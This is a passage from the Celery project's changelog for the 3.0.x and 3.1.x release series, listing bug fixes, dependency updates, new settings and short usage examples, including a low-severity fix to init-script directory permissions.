default (only configured when the :envvar:`MP_LOG` environment variable was set). .. _version-3.0.13: 3.0.13 ====== :release-date: 2013-01-07 04:00:00 p.m. UTC :release-by: Ask Solem - Now depends on Kombu 2.5 - :pypi:`amqp` has replaced :pypi:`amqplib` as the default transport, gaining support for AMQP 0.9, and the RabbitMQ extensions, including Consumer Cancel Notifications and heartbeats. - support for multiple connection URLs for failover. - Read more in the :ref:`Kombu 2.5 changelog `. - Now depends on billiard 2.7.3.19 - Fixed a deadlock issue that could occur when the producer pool inherited the connection pool instance of the parent process. - The :option:`--loader ` option now works again (Issue #1066). - :program:`celery` umbrella command: All sub-commands now supports the :option:`--workdir ` option (Issue #1063). - Groups included in chains now give GroupResults (Issue #1057) Previously it would incorrectly add a regular result instead of a group result, but now this works: .. code-block:: pycon >>> # [4 + 4, 4 + 8, 16 + 8] >>> res = (add.s(2, 2) | group(add.s(4), add.s(8), add.s(16)))() >>> res - Chains can now chain other chains and use partial arguments (Issue #1057). Example: .. code-block:: pycon >>> c1 = (add.s(2) | add.s(4)) >>> c2 = (add.s(8) | add.s(16)) >>> c3 = (c1 | c2) >>> # 8 + 2 + 4 + 8 + 16 >>> assert c3(8).get() == 38 - Subtasks can now be used with unregistered tasks. You can specify subtasks even if you just have the name:: >>> s = subtask(task_name, args=(), kwargs=()) >>> s.delay() - The :program:`celery shell` command now always adds the current directory to the module path. - The worker will now properly handle the :exc:`pytz.AmbiguousTimeError` exception raised when an ETA/countdown is prepared while being in DST transition (Issue #1061). 
- force_execv: Now makes sure that task symbols in the original task modules will always use the correct app instance (Issue #1072). - AMQP Backend: Now republishes result messages that have been polled (using ``result.ready()`` and friends, ``result.get()`` won't do this in this version). - Crontab schedule values can now "wrap around" This means that values like ``11-1`` translates to ``[11, 12, 1]``. Contributed by Loren Abrams. - ``multi stopwait`` command now shows the pid of processes. Contributed by Loren Abrams. - Handling of ETA/countdown fixed when the :setting:`CELERY_ENABLE_UTC` setting is disabled (Issue #1065). - A number of unneeded properties were included in messages, caused by accidentally passing ``Queue.as_dict`` as message properties. - Rate limit values can now be float This also extends the string format so that values like ``"0.5/s"`` works. Contributed by Christoph Krybus - Fixed a typo in the broadcast routing documentation (Issue #1026). - Rewrote confusing section about idempotence in the task user guide. - Fixed typo in the daemonization tutorial (Issue #1055). - Fixed several typos in the documentation. Contributed by Marius Gedminas. - Batches: Now works when using the eventlet pool. Fix contributed by Thomas Grainger. - Batches: Added example sending results to ``celery.contrib.batches``. Contributed by Thomas Grainger. - MongoDB backend: Connection ``max_pool_size`` can now be set in :setting:`CELERY_MONGODB_BACKEND_SETTINGS`. Contributed by Craig Younkins. - Fixed problem when using earlier versions of :pypi:`pytz`. Fix contributed by Vlad. - Docs updated to include the default value for the :setting:`CELERY_TASK_RESULT_EXPIRES` setting. - Improvements to the :pypi:`django-celery` tutorial. Contributed by Locker537. - The ``add_consumer`` control command didn't properly persist the addition of new queues so that they survived connection failure (Issue #1079). 3.0.12 ====== :release-date: 2012-11-06 02:00 p.m. UTC :release-by: Ask Solem - Now depends on kombu 2.4.8 - [Redis] New and improved fair queue cycle algorithm (Kevin McCarthy). - [Redis] Now uses a Redis-based mutex when restoring messages. - [Redis] Number of messages that can be restored in one interval is no longer limited (but can be set using the ``unacked_restore_limit`` :setting:`transport option `). - Heartbeat value can be specified in broker URLs (Mher Movsisyan). - Fixed problem with msgpack on Python 3 (Jasper Bryant-Greene). - Now depends on billiard 2.7.3.18 - Celery can now be used with static analysis tools like PyDev/PyCharm/pylint etc. - Development documentation has moved to Read The Docs. The new URL is: http://docs.celeryproject.org/en/master - New :setting:`CELERY_QUEUE_HA_POLICY` setting used to set the default HA policy for queues when using RabbitMQ. - New method ``Task.subtask_from_request`` returns a subtask using the current request. - Results get_many method didn't respect timeout argument. Fix contributed by Remigiusz Modrzejewski - generic_init.d scripts now support setting :envvar:`CELERY_CREATE_DIRS` to always create log and pid directories (Issue #1045). This can be set in your :file:`/etc/default/celeryd`. - Fixed strange kombu import problem on Python 3.2 (Issue #1034). - Worker: ETA scheduler now uses millisecond precision (Issue #1040). - The :option:`--config ` argument to programs is now supported by all loaders. - The :setting:`CASSANDRA_OPTIONS` setting has now been documented. Contributed by Jared Biel. 
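A short sketch of the float rate-limit format mentioned in the entries above; the app setup, broker URL, and task body are placeholders:

.. code-block:: python

    from celery import Celery

    app = Celery('proj', broker='amqp://')  # placeholder broker URL

    @app.task(rate_limit='0.5/s')  # at most one execution every two seconds
    def fetch_feed(url):
        return url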
- Task methods (:mod:`celery.contrib.methods`) cannot be used with the old task base class, the task decorator in that module now inherits from the new. - An optimization was too eager and caused some logging messages to never emit. - ``celery.contrib.batches`` now works again. - Fixed missing white-space in ``bdist_rpm`` requirements (Issue #1046). - Event state's ``tasks_by_name`` applied limit before filtering by name. Fix contributed by Alexander A. Sosnovskiy. .. _version-3.0.11: 3.0.11 ====== :release-date: 2012-09-26 04:00 p.m. UTC :release-by: Ask Solem - [security:low] generic-init.d scripts changed permissions of /var/log & /var/run In the daemonization tutorial the recommended directories were as follows: .. code-block:: bash CELERYD_LOG_FILE="/var/log/celery/%n.log" CELERYD_PID_FILE="/var/run/celery/%n.pid" But in the scripts themselves the default files were ``/var/log/celery%n.log`` and ``/var/run/celery%n.pid``, so if the user didn't change the location by configuration, the directories ``/var/log`` and ``/var/run`` would be created - and worse have their permissions and owners changed. This change means that: - Default pid file is ``/var/run/celery/%n.pid`` - Default log file is ``/var/log/celery/%n.log`` - The directories are only created and have their permissions changed if *no custom locations are set*. Users can force paths to be created by calling the ``create-paths`` sub-command: .. code-block:: console $ sudo /etc/init.d/celeryd create-paths .. admonition:: Upgrading Celery won't update init-scripts To update the init-scripts you have to re-download the files from source control and update them manually. You can find the init-scripts for version 3.0.x at: https://github.com/celery/celery/tree/3.0/extra/generic-init.d - Now depends on billiard 2.7.3.17 - Fixes request stack protection when app is initialized more than once (Issue #1003). - ETA tasks now properly works when system timezone isn't same as the configured timezone (Issue #1004). - Terminating a task now works if the task has been sent to the pool but not yet acknowledged by a pool process (Issue #1007). Fix contributed by Alexey Zatelepin - Terminating a task now properly updates the state of the task to revoked, and sends a ``task-revoked`` event. - Generic worker init-script now waits for workers to shutdown by default. - Multi: No longer parses --app option (Issue #1008). - Multi: ``stop_verify`` command renamed to ``stopwait``. - Daemonization: Now delays trying to create pidfile/logfile until after the working directory has been changed into. - :program:`celery worker` and :program:`celery beat` commands now respects the :option:`--no-color ` option (Issue #999). - Fixed typos in eventlet examples (Issue #1000) Fix contributed by Bryan Bishop. Congratulations on opening bug #1000! - Tasks that raise :exc:`~celery.exceptions.Ignore` are now acknowledged. - Beat: Now shows the name of the entry in ``sending due task`` logs. .. _version-3.0.10: 3.0.10 ====== :release-date: 2012-09-20 05:30 p.m. BST :release-by: Ask Solem - Now depends on kombu 2.4.7 - Now depends on billiard 2.7.3.14 - Fixes crash at start-up when using Django and pre-1.4 projects (``setup_environ``). - Hard time limits now sends the KILL signal shortly after TERM, to terminate processes that have signal handlers blocked by C extensions. - Billiard now installs even if the C extension cannot be built. 
It's still recommended to build the C extension if you're using a transport other than RabbitMQ/Redis (or use forced execv for some other reason). - Pool now sets a ``current_process().index`` attribute that can be used to create as many log files as there are processes in the pool. - Canvas: chord/group/chain no longer modifies the state when called Previously calling a chord/group/chain would modify the ids of subtasks so that: .. code-block:: pycon >>> c = chord([add.s(2, 2), add.s(4, 4)], xsum.s()) >>> c() >>> c() <-- call again at the second time the ids for the tasks would be the same as in the previous invocation. This is now fixed, so that calling a subtask won't mutate any options. - Canvas: Chaining a chord to another task now works (Issue #965). - Worker: Fixed a bug where the request stack could be corrupted if relative imports are used. Problem usually manifested itself as an exception while trying to send a failed task result (``NoneType does not have id attribute``). Fix contributed by Sam Cooke. - Tasks can now raise :exc:`~celery.exceptions.Ignore` to skip updating states or events after return. Example: .. code-block:: python from celery.exceptions import Ignore @task def custom_revokes(): if redis.sismember('tasks.revoked', custom_revokes.request.id): raise Ignore() - The worker now makes sure the request/task stacks aren't modified by the initial ``Task.__call__``. This would previously be a problem if a custom task class defined ``__call__`` and also called ``super()``. - Because of problems the fast local optimization has been disabled, and can only be enabled by setting the :envvar:`USE_FAST_LOCALS` attribute. - Worker: Now sets a default socket timeout of 5 seconds at shutdown so that broken socket reads don't hinder proper shutdown (Issue #975). - More fixes related to late eventlet/gevent patching. - Documentation for settings out of sync with reality: - :setting:`CELERY_TASK_PUBLISH_RETRY` Documented as disabled by default, but it was enabled by default since 2.5 as stated by the 2.5 changelog. - :setting:`CELERY_TASK_PUBLISH_RETRY_POLICY` The default max_retries had been set to 100, but documented as being 3, and the interval_max was set to 1 but documented as 0.2. The default setting are now set to 3 and 0.2 as it was originally documented. Fix contributed by Matt Long. - Worker: Log messages when connection established and lost have been improved. - The repr of a Crontab schedule value of '0' should be '*' (Issue #972). - Revoked tasks are now removed from reserved/active state in the worker (Issue #969) Fix contributed by Alexey Zatelepin. - gevent: Now supports hard time limits using ``gevent.Timeout``. - Documentation: Links to init-scripts now point to the 3.0 branch instead of the development branch (master). - Documentation: Fixed typo in signals user guide (Issue #986). ``instance.app.queues`` -> ``instance.app.amqp.queues``. - Eventlet/gevent: The worker didn't properly set the custom app for new greenlets. - Eventlet/gevent: Fixed a bug where the worker could not recover from connection loss (Issue #959). Also, because of a suspected bug in gevent the :setting:`BROKER_CONNECTION_TIMEOUT` setting has been disabled when using gevent 3.0.9 ===== :release-date: 2012-08-31 06:00 p.m. BST :release-by: Ask Solem - Important note for users of Django and the database scheduler! 
Recently a timezone issue has been fixed for periodic tasks, but erroneous timezones could have already been stored in the database, so for the fix to work you need to reset the ``last_run_at`` fields. You can do this by executing the following command: .. code-block:: console $ python manage.py shell >>> from djcelery.models import PeriodicTask >>> PeriodicTask.objects.update(last_run_at=None) You also have to do this if you change the timezone or :setting:`CELERY_ENABLE_UTC` setting. - Note about the :setting:`CELERY_ENABLE_UTC` setting. If you previously disabled this just to force periodic tasks to work with your timezone, then you're now *encouraged to re-enable it*. - Now depends on Kombu 2.4.5 which fixes PyPy + Jython installation. - Fixed bug with timezones when :setting:`CELERY_ENABLE_UTC` is disabled (Issue #952). - Fixed a typo in the ``celerybeat`` upgrade mechanism (Issue #951). - Make sure the `exc_info` argument to logging is resolved (Issue #899). - Fixed problem with Python 3.2 and thread join timeout overflow (Issue #796). - A test case was occasionally broken for Python 2.5. - Unit test suite now passes for PyPy 1.9. - App instances now supports the :keyword:`with` statement. This calls the new :meth:`@close` method at exit, which cleans up after the app like closing pool connections. Note that this is only necessary when dynamically creating apps, for example "temporary" apps. - Support for piping a subtask to a chain. For example: .. code-block:: python pipe = sometask.s() | othertask.s() new_pipe = mytask.s() | pipe Contributed by Steve Morin. - Fixed problem with group results on non-pickle serializers. Fix contributed by Steeve Morin. .. _version-3.0.8: 3.0.8 ===== :release-date: 2012-08-29 05:00 p.m. BST :release-by: Ask Solem - Now depends on Kombu 2.4.4 - Fixed problem with :pypi:`amqplib` and receiving larger message payloads (Issue #922). The problem would manifest itself as either the worker hanging, or occasionally a ``Framing error`` exception appearing. Users of the new ``pyamqp://`` transport must upgrade to :pypi:`amqp` 0.9.3. - Beat: Fixed another timezone bug with interval and Crontab schedules (Issue #943). - Beat: The schedule file is now automatically cleared if the timezone is changed. The schedule is also cleared when you upgrade to 3.0.8 from an earlier version, this to register the initial timezone info. - Events: The :event:`worker-heartbeat` event now include processed and active count fields. Contributed by Mher Movsisyan. - Fixed error with error email and new task classes (Issue #931). - ``BaseTask.__call__`` is no longer optimized away if it has been monkey patched. - Fixed shutdown issue when using gevent (Issue #911 & Issue #936). Fix contributed by Thomas Meson. .. _version-3.0.7: 3.0.7 ===== :release-date: 2012-08-24 05:00 p.m. BST :release-by: Ask Solem - Fixes several problems with periodic tasks and timezones (Issue #937). - Now depends on kombu 2.4.2 - Redis: Fixes a race condition crash - Fixes an infinite loop that could happen when retrying establishing the broker connection. - Daemons now redirect standard file descriptors to :file:`/dev/null` Though by default the standard outs are also redirected to the logger instead, but you can disable this by changing the :setting:`CELERY_REDIRECT_STDOUTS` setting. - Fixes possible problems when eventlet/gevent is patched too late. - ``LoggingProxy`` no longer defines ``fileno()`` (Issue #928). - Results are now ignored for the chord unlock task. Fix contributed by Steeve Morin. 
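A hedged sketch of the new context-manager support for app instances described in the 3.0.9 entries above (the broker URL is a placeholder):

.. code-block:: python

    from celery import Celery

    # A "temporary" app: app.close() is called automatically when the
    # with-block exits, cleaning up resources such as pool connections.
    with Celery('tmp', broker='amqp://') as tmp_app:
        print(tmp_app.main)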
- Cassandra backend now works if result expiry is disabled.

    Fix contributed by Steeve Morin.

- The traceback object is now passed to signal handlers instead
  of the string representation.

    Fix contributed by Adam DePue.

- Celery command: Extensions are now sorted by name.

- A regression caused the :event:`task-failed` event to be sent
  with the exception object instead of its string representation.

- The worker daemon would try to create the pid file before daemonizing
  to catch errors, but this file wasn't immediately released (Issue #923).

- Fixes Jython compatibility.

- ``billiard.forking_enable`` was called by all pools, not just the
  processes pool, which would result in a useless warning if the billiard
  C extensions weren't installed.

.. _version-3.0.6:

3.0.6
=====
:release-date: 2012-08-17 11:00 p.m.
:release-by: Ask Solem

- Now depends on kombu 2.4.0

- Now depends on billiard 2.7.3.12

- Redis: Celery now tries to restore messages whenever there are
  no messages in the queue.

- Crontab schedules now properly respect the :setting:`CELERY_TIMEZONE`
  setting.

    It's important to note that Crontab schedules use UTC time by default
    unless this setting is set.

    Issue #904 and :pypi:`django-celery` #150.

- ``billiard.enable_forking`` is now only set by the processes pool.

- The transport is now properly shown by :program:`celery report`
  (Issue #913).

- The `--app` argument now works if the last part is a module name
  (Issue #921).

- Fixed problem with unpickleable exceptions (billiard #12).

- Adds ``task_name`` attribute to ``EagerResult`` which is always
  :const:`None` (Issue #907).

- Old Task class in :mod:`celery.task` no longer accepts magic kwargs by
  default (Issue #918).

    A regression long ago disabled magic kwargs for these, and since
    no one has complained about it we don't have any incentive to fix it now.

- The ``inspect reserved`` control command didn't work properly.

- Should now play better with tools for static analysis by explicitly
  specifying dynamically created attributes in the :mod:`celery` and
  :mod:`celery.task` modules.

- Terminating a task now results in
  :exc:`~celery.exceptions.TaskRevokedError` instead of a ``WorkerLostError``.

- ``AsyncResult.revoke`` now accepts ``terminate`` and ``signal`` arguments.

- The :event:`task-revoked` event now includes new fields: ``terminated``,
  ``signum``, and ``expired``.

- The argument to :class:`~celery.exceptions.TaskRevokedError` is now one
  of the reasons ``revoked``, ``expired`` or ``terminated``.

- Old Task class no longer uses :class:`classmethod` for ``push_request``
  and ``pop_request`` (Issue #912).

- ``GroupResult`` now supports the ``children`` attribute (Issue #916).

- ``AsyncResult.collect`` now respects the ``intermediate`` argument
  (Issue #917).

- Fixes example task in documentation (Issue #902).

- Eventlet fixed so that the environment is patched as soon as possible.

- eventlet: Now warns if Celery-related modules that depend on threads
  are imported before eventlet is patched.

- Improved event and camera examples in the monitoring guide.

- Disables celery command setuptools entry-points if the command can't be
  loaded.

- Fixed broken ``dump_request`` example in the tasks guide.

.. _version-3.0.5:

3.0.5
=====
:release-date: 2012-08-01 04:00 p.m. BST
:release-by: Ask Solem

- Now depends on kombu 2.3.1 + billiard 2.7.3.11

- Fixed a bug with the -B option (``cannot pickle thread.lock objects``)
  (Issue #894 + Issue #892, + :pypi:`django-celery` #154).
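A minimal sketch of the extended ``AsyncResult.revoke`` signature from the 3.0.6 entries above (the task id is a placeholder):

.. code-block:: python

    from celery.result import AsyncResult

    # Revoke the task and terminate the worker child process currently
    # executing it, sending SIGKILL instead of the default SIGTERM.
    res = AsyncResult('00000000-0000-0000-0000-000000000000')
    res.revoke(terminate=True, signal='SIGKILL')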
- The :control:`restart_pool` control command now requires the :setting:`CELERYD_POOL_RESTARTS` setting to be enabled This change was necessary as the multiprocessing event that the restart command depends on is responsible for creating many semaphores/file descriptors, resulting in problems in some environments. - ``chain.apply`` now passes args to the first task (Issue #889). - Documented previously secret options to the :pypi:`django-celery` monitor in the monitoring user guide (Issue #396). - Old changelog are now organized in separate documents for each series, see :ref:`history`. .. _version-3.0.4: 3.0.4 ===== :release-date: 2012-07-26 07:00 p.m. BST :release-by: Ask Solem - Now depends on Kombu 2.3 - New experimental standalone Celery monitor: Flower See :ref:`monitoring-flower` to read more about it! Contributed by Mher Movsisyan. - Now supports AMQP heartbeats if using the new ``pyamqp://`` transport. - The :pypi:`amqp` transport requires the :pypi:`amqp` library to be installed: .. code-block:: console $ pip install amqp - Then you need to set the transport URL prefix to ``pyamqp://``. - The default heartbeat value is 10 seconds, but this can be changed using the :setting:`BROKER_HEARTBEAT` setting:: BROKER_HEARTBEAT = 5.0 - If the broker heartbeat is set to 10 seconds, the heartbeats will be monitored every 5 seconds (double the heartbeat rate). See the :ref:`Kombu 2.3 changelog ` for more information. - Now supports RabbitMQ Consumer Cancel Notifications, using the ``pyamqp://`` transport. This is essential when running RabbitMQ in a cluster. See the :ref:`Kombu 2.3 changelog ` for more information. - Delivery info is no longer passed directly through. It was discovered that the SQS transport adds objects that can't be pickled to the delivery info mapping, so we had to go back to using the white-list again. Fixing this bug also means that the SQS transport is now working again. - The semaphore wasn't properly released when a task was revoked (Issue #877). This could lead to tasks being swallowed and not released until a worker restart. Thanks to Hynek Schlawack for debugging the issue. - Retrying a task now also forwards any linked tasks. This means that if a task is part of a chain (or linked in some other way) and that even if the task is retried, then the next task in the chain will be executed when the retry succeeds. - Chords: Now supports setting the interval and other keyword arguments to the chord unlock task. - The interval can now be set as part of the chord subtasks kwargs:: chord(header)(body, interval=10.0) - In addition the chord unlock task now honors the Task.default_retry_delay option, used when none is specified, which also means that the default interval can also be changed using annotations: .. code-block:: python CELERY_ANNOTATIONS = { 'celery.chord_unlock': { 'default_retry_delay': 10.0, } } - New :meth:`@add_defaults` method can add new default configuration dictionaries to the applications configuration. For example:: config = {'FOO': 10} app.add_defaults(config) is the same as ``app.conf.update(config)`` except that data won't be copied, and that it won't be pickled when the worker spawns child processes. In addition the method accepts a callable:: def initialize_config(): # insert heavy stuff that can't be done at import time here. app.add_defaults(initialize_config) which means the same as the above except that it won't happen until the Celery configuration is actually used. 
As an example, Celery can lazily use the configuration of a Flask app:: flask_app = Flask() app = Celery() app.add_defaults(lambda: flask_app.config) - Revoked tasks weren't marked as revoked in the result backend (Issue #871). Fix contributed by Hynek Schlawack. - Event-loop now properly handles the case when the :manpage:`epoll` poller object has been closed (Issue #882). - Fixed syntax error in ``funtests/test_leak.py`` Fix contributed by Catalin Iacob. - group/chunks: Now accepts empty task list (Issue #873). - New method names: - ``Celery.default_connection()`` ➠ :meth:`~@connection_or_acquire`. - ``Celery.default_producer()`` ➠ :meth:`~@producer_or_acquire`. The old names still work for backward compatibility. .. _version-3.0.3: 3.0.3 ===== :release-date: 2012-07-20 09:17 p.m. BST :release-by: Ask Solem - :pypi:`amqplib` passes the channel object as part of the delivery_info and it's not pickleable, so we now remove it. .. _version-3.0.2: 3.0.2 ===== :release-date: 2012-07-20 04:00 p.m. BST :release-by: Ask Solem - A bug caused the following task options to not take defaults from the configuration (Issue #867 + Issue #858) The following settings were affected: - :setting:`CELERY_IGNORE_RESULT` - :setting:`CELERYD_SEND_TASK_ERROR_EMAILS` - :setting:`CELERY_TRACK_STARTED` - :setting:`CElERY_STORE_ERRORS_EVEN_IF_IGNORED` Fix contributed by John Watson. - Task Request: ``delivery_info`` is now passed through as-is (Issue #807). - The ETA argument now supports datetime's with a timezone set (Issue #855). - The worker's banner displayed the autoscale settings in the wrong order (Issue #859). - Extension commands are now loaded after concurrency is set up so that they don't interfere with things like eventlet patching. - Fixed bug in the threaded pool (Issue #863) - The task failure handler mixed up the fields in :func:`sys.exc_info`. Fix contributed by Rinat Shigapov. - Fixed typos and wording in the docs. Fix contributed by Paul McMillan - New setting: :setting:`CELERY_WORKER_DIRECT` If enabled each worker will consume from their own dedicated queue which can be used to route tasks to specific workers. - Fixed several edge case bugs in the add consumer remote control command. - :mod:`~celery.contrib.migrate`: Can now filter and move tasks to specific workers if :setting:`CELERY_WORKER_DIRECT` is enabled. Among other improvements, the following functions have been added: * ``move_direct(filterfun, **opts)`` * ``move_direct_by_id(task_id, worker_hostname, **opts)`` * ``move_direct_by_idmap({task_id: worker_hostname, ...}, **opts)`` * ``move_direct_by_taskmap({task_name: worker_hostname, ...}, **opts)`` - :meth:`~celery.Celery.default_connection` now accepts a pool argument that if set to false causes a new connection to be created instead of acquiring one from the pool. - New signal: :signal:`celeryd_after_setup`. - Default loader now keeps lowercase attributes from the configuration module. .. _version-3.0.1: 3.0.1 ===== :release-date: 2012-07-10 06:00 p.m. BST :release-by: Ask Solem - Now depends on kombu 2.2.5 - inspect now supports limit argument:: myapp.control.inspect(limit=1).ping() - Beat: now works with timezone aware datetime's. - Task classes inheriting ``from celery import Task`` mistakenly enabled ``accept_magic_kwargs``. - Fixed bug in ``inspect scheduled`` (Issue #829). - Beat: Now resets the schedule to upgrade to UTC. - The :program:`celery worker` command now works with eventlet/gevent. Previously it wouldn't patch the environment early enough. 
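A hedged sketch of the renamed connection helpers from the 3.0.4 entries above, assuming an already configured ``app`` instance:

.. code-block:: python

    # Celery.default_connection() still works, but the new name is clearer;
    # used as a context manager the connection is returned to the pool
    # (or closed) when the block exits.
    with app.connection_or_acquire() as connection:
        print(connection.as_uri())  # broker URL with the password masked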
- The :program:`celery` command now supports extension commands
  using setuptools entry-points.

    Libraries can add additional commands to the :program:`celery`
    command by adding an entry-point like:

    .. code-block:: python

        setup(
            entry_points={
                'celery.commands': [
                    'foo = my.module:Command',
                ],
            },
            ...)

    The command must then support the interface of
    :class:`celery.bin.base.Command`.

- contrib.migrate: New utilities to move tasks from one queue to another.

    - :func:`~celery.contrib.migrate.move_tasks`
    - :func:`~celery.contrib.migrate.move_task_by_id`

- The :event:`task-sent` event now contains ``exchange`` and ``routing_key``
  fields.

- Fixes bug with installing on Python 3.

    Fix contributed by Jed Smith.

.. _version-3.0.0:

3.0.0 (Chiastic Slide)
======================
:release-date: 2012-07-07 01:30 p.m. BST
:release-by: Ask Solem

See :ref:`whatsnew-3.0`.

.. _changelog-3.1:

================
 Change history
================

This document contains change notes for bugfix releases in the 3.1.x series
(Cipater), please see :ref:`whatsnew-3.1` for an overview of what's new in
Celery 3.1.

.. _version-3.1.26:

3.1.26
======
:release-date: 2018-03-23 04:00 p.m. IST
:release-by: Omer Katz

- Fixed a crash caused by tasks cycling between Celery 3 and Celery 4 workers.

.. _version-3.1.25:

3.1.25
======
:release-date: 2016-10-10 12:00 p.m. PDT
:release-by: Ask Solem

- **Requirements**

    - Now depends on :ref:`Kombu 3.0.37 `

- Fixed problem with chords in group introduced in 3.1.24 (Issue #3504).

.. _version-3.1.24:

3.1.24
======
:release-date: 2016-09-30 04:21 p.m. PDT
:release-by: Ask Solem

- **Requirements**

    - Now depends on :ref:`Kombu 3.0.36 `.

- Now supports Task protocol 2 from the future 4.0 release.

    Workers running 3.1.24 are now able to process messages sent using
    the `new task message protocol`_ to be introduced in Celery 4.0.

    Users upgrading to Celery 4.0 when this is released are encouraged to
    upgrade to this version as an intermediate step, as this means workers
    not yet upgraded will be able to process messages from clients/workers
    running 4.0.

.. _`new task message protocol`:
    http://docs.celeryproject.org/en/master/internals/protocol.html#version-2

- ``Task.send_events`` can now be set to disable sending of events
  for that task only.

    Example when defining the task:

    .. code-block:: python

        @app.task(send_events=False)
        def add(x, y):
            return x + y

- **Utils**: Fixed compatibility with recent :pypi:`psutil` versions
  (Issue #3262).

- **Canvas**: Chord now forwards partial arguments to its subtasks.

    Fix contributed by Tayfun Sen.

- **App**: Arguments to app such as ``backend``, ``broker``, etc. are now
  pickled and sent to the child processes on Windows.

    Fix contributed by Jeremy Zafran.

- **Deployment**: Generic init scripts now support being symlinked
  in runlevel directories (Issue #3208).

- **Deployment**: Updated CentOS scripts to work with CentOS 7.

    Contributed by Joe Sanford.

- **Events**: The curses monitor no longer crashes when the result
  of a task is empty.

    Fix contributed by Dongweiming.

- **Worker**: ``repr(worker)`` would crash when called early
  in the startup process (Issue #2514).

- **Tasks**: GroupResult now defines ``__bool__`` and ``__nonzero__``.
    This is to fix an issue where a ResultSet or GroupResult with an empty
    result list is not properly tupled with the ``as_tuple()`` method when
    it is a parent result. This is due to the ``as_tuple()`` method
    performing a logical ``and`` operation on the ResultSet.

    Fix contributed by Colin McIntosh.

- **Worker**: Fixed wrong values in autoscale related logging message.

    Fix contributed by ``@raducc``.

- Documentation improvements by

    * Alexandru Chirila
    * Michael Aquilina
    * Mikko Ekström
    * Mitchel Humpherys
    * Thomas A. Neil
    * Tiago Moreira Vieira
    * Yuriy Syrovetskiy
    * ``@dessant``

.. _version-3.1.23:

3.1.23
======
:release-date: 2016-03-09 06:00 p.m. PST
:release-by: Ask Solem

- **Programs**: Last release broke support for the ``--hostname`` argument
  to :program:`celery multi` and :program:`celery worker --detach`
  (Issue #3103).

- **Results**: MongoDB result backend could crash the worker at startup
  if not configured using a URL.

.. _version-3.1.22:

3.1.22
======
:release-date: 2016-03-07 01:30 p.m. PST
:release-by: Ask Solem

- **Programs**: The worker would crash immediately on startup on
  ``backend.as_uri()`` when using some result backends (Issue #3094).

- **Programs**: :program:`celery multi`/:program:`celery worker --detach`
  would create an extraneous logfile including literal formats (e.g. ``%I``)
  in the filename (Issue #3096).

.. _version-3.1.21:

3.1.21
======
:release-date: 2016-03-04 11:16 a.m. PST
:release-by: Ask Solem

- **Requirements**

    - Now depends on :ref:`Kombu 3.0.34 `.
    - Now depends on :mod:`billiard` 3.3.0.23.

- **Prefork pool**: Fixes 100% CPU loop on Linux :manpage:`epoll`
  (Issue #1845).

    Also potential fix for: Issue #2142, Issue #2606

- **Prefork pool**: Fixes memory leak related to processes exiting
  (Issue #2927).

- **Worker**: Fixes crash at start-up when trying to censor passwords
  in MongoDB and Cache result backend URLs (Issue #3079, Issue #3045,
  Issue #3049, Issue #3068, Issue #3073).

    Fix contributed by Maxime Verger.

- **Task**: An exception is now raised if countdown/expires is less
  than -2147483648 (Issue #3078).

- **Programs**: :program:`celery shell --ipython` now compatible with newer
  :pypi:`IPython` versions.

- **Programs**: The DuplicateNodeName warning emitted by inspect/control
  now includes a list of the node names returned.

    Contributed by Sebastian Kalinowski.

- **Utils**: The ``.discard(item)`` method of
  :class:`~celery.utils.collections.LimitedSet` didn't actually remove
  the item (Issue #3087).

    Fix contributed by Dave Smith.

- **Worker**: Node name formatting now emits less confusing error message
  for unmatched format keys (Issue #3016).

- **Results**: RPC/AMQP backends: Fixed deserialization of JSON exceptions
  (Issue #2518).

    Fix contributed by Allard Hoeve.

- **Prefork pool**: The `process inqueue damaged` error message now includes
  the original exception raised.

- **Documentation**: Includes improvements by:

    - Jeff Widman.

.. _version-3.1.20:

3.1.20
======
:release-date: 2016-01-22 06:50 p.m. UTC
:release-by: Ask Solem

- **Requirements**

    - Now depends on :ref:`Kombu 3.0.33 `.
    - Now depends on :mod:`billiard` 3.3.0.22.

        Includes binary wheels for Microsoft Windows x86 and x86_64!

- **Task**: Error emails now use the ``utf-8`` character set by default
  (Issue #2737).

- **Task**: Retry now forwards original message headers (Issue #3017).

- **Worker**: Bootsteps can now hook into ``on_node_join``/``leave``/``lost``.

    See :ref:`extending-consumer-attributes` for an example.

- **Events**: Fixed handling of DST timezones (Issue #2983).
- **Results**: Redis backend stopped respecting certain settings. Contributed by Jeremy Llewellyn. - **Results**: Database backend now properly supports JSON exceptions (Issue #2441). - **Results**: Redis ``new_join`` didn't properly call task errbacks on chord error (Issue #2796). - **Results**: Restores Redis compatibility with Python :pypi:`redis` < 2.10.0 (Issue #2903). - **Results**: Fixed rare issue with chord error handling (Issue #2409). - **Tasks**: Using queue-name values in :setting:`CELERY_ROUTES` now works again (Issue #2987). - **General**: Result backend password now sanitized in report output (Issue #2812, Issue #2004). - **Configuration**: Now gives helpful error message when the result backend configuration points to a module, and not a class (Issue #2945). - **Results**: Exceptions sent by JSON serialized workers are now properly handled by pickle configured workers. - **Programs**: ``celery control autoscale`` now works (Issue #2950). - **Programs**: ``celery beat --detached`` now runs after fork callbacks. - **General**: Fix for LRU cache implementation on Python 3.5 (Issue #2897). Contributed by Dennis Brakhane. Python 3.5's ``OrderedDict`` doesn't allow mutation while it is being iterated over. This breaks "update" if it is called with a dict larger than the maximum size. This commit changes the code to a version that doesn't iterate over the dict, and should also be a little bit faster. - **Init-scripts**: The beat init-script now properly reports service as down when no pid file can be found. Eric Zarowny - **Beat**: Added cleaning of corrupted scheduler files for some storage backend errors (Issue #2985). Fix contributed by Aleksandr Kuznetsov. - **Beat**: Now syncs the schedule even if the schedule is empty. Fix contributed by Colin McIntosh. - **Supervisord**: Set higher process priority in the :pypi:`supervisord` example. Contributed by George Tantiras. - **Documentation**: Includes improvements by: :github_user:`Bryson` Caleb Mingle Christopher Martin Dieter Adriaenssens Jason Veatch Jeremy Cline Juan Rossi Kevin Harvey Kevin McCarthy Kirill Pavlov Marco Buttu :github_user:`Mayflower` Mher Movsisyan Michael Floering :github_user:`michael-k` Nathaniel Varona Rudy Attias Ryan Luckie Steven Parker :github_user:`squfrans` Tadej Janež TakesxiSximada Tom S .. _version-3.1.19: 3.1.19 ====== :release-date: 2015-10-26 01:00 p.m. UTC :release-by: Ask Solem - **Requirements** - Now depends on :ref:`Kombu 3.0.29 `. - Now depends on :mod:`billiard` 3.3.0.21. - **Results**: Fixed MongoDB result backend URL parsing problem (Issue celery/kombu#375). - **Worker**: Task request now properly sets ``priority`` in delivery_info. Fix contributed by Gerald Manipon. - **Beat**: PyPy shelve may raise ``KeyError`` when setting keys (Issue #2862). - **Programs**: :program:`celery beat --deatched` now working on PyPy. Fix contributed by Krzysztof Bujniewicz. - 